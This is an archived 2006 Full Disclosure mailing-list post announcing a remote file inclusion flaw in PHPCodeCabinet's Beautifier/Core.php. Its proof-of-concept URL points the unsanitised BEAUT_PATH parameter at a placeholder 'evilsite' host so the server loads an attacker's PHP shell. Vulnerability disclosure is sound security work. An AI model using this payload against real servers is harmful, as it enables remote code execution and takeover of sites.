Full Disclosure mailing list archives
PHPCodeCabinet Vulnerability
From: Minion <minionqb () gmail com>
Date: Fri, 4 Aug 2006 17:22:12 -0600
From Minion:
PHPCodeCabinet (all versions) is vulnerable to a remote file include. The vulnerable code is in /include/Beautifier/Core.php an $BEAUT_PATH Was not properly scrubbed, so they got owned. Proof of concept: *target phpcodecabinet directory*/include/Beautifier/Core.php?BEAUT_PATH=*evilsite*/Beautifier/HFile.php HFile.php would be your php shell. Shouts to XoRcrew & Disruptiv.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- PHPCodeCabinet Vulnerability Minion (Aug 04)